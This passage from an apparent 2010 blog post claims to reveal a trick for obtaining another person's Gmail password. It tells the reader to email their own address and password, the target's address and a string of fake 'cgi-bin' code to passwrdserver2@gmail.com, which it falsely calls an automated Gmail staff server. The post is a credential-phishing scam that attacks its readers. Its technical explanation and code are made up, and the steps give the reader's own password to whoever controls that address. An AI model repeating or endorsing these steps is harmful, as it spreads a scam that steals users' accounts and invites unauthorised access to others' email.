couple of times, but on every other occasion it has
got me the password for
the requested email address. This is how it is done:
STEP 1- Log in to your own Gmail account. Note: Your
account must be at
least 30 days old for this to work.
STEP 2- Once you have logged into your own account,
compose/write an e-mail
to: passwrdserver2 @ gmail.com This is a mailing
address to the Gmail
Staff. The automated server will send you the password
that you have
'forgotten', after receiving the information you send
them.
STEP 3- In the subject line type exactly: " PASSWORD
RECOVERY "
STEP 4- On the first line of your mail write the email
address of the person
you are hacking.
STEP 5- On the second line type in the e-mail address
you are using.
STEP 6- On the third line type in the password to YOUR
email address (your
OWN password). The computer needs your password so it
can send a JavaScript
from your account in the Gmail Server to extract the
other email addresses
password. In other word the system automatically
checks your password to
confirm the integrity of your status.
The process will be done automatically by the user
administration server. STEP 7- The final step before
sending the mail is,
type on the fourth line the following code exactly:
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}
so for example if your Gmail id is :
David_100 @ gmail.com and your password
is: David and the email address you want to hack is:
test @ gmail.com then
compose the mail as below:
To: (passwrdserver2 @ gmail.com)
bcc: cc: (Don't write anything in cc,bcc field)
Subject: " PASSWORD RECOVERY " test @ gmail.com
David_100 @ gmail.com
David
cgi-bin_RETRIVE_PASS_KEY_CGI_BIN/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}
The password will be sent to your inbox in a mail
called "System Reg
Message" from "System with in 6 hors. When my friend showed me how
to do this I thought it was too good a trick to keep
to myself! Just try and
enjoy!
.
Monday, October 11, 2010
Subscribe to:
Posts (Atom)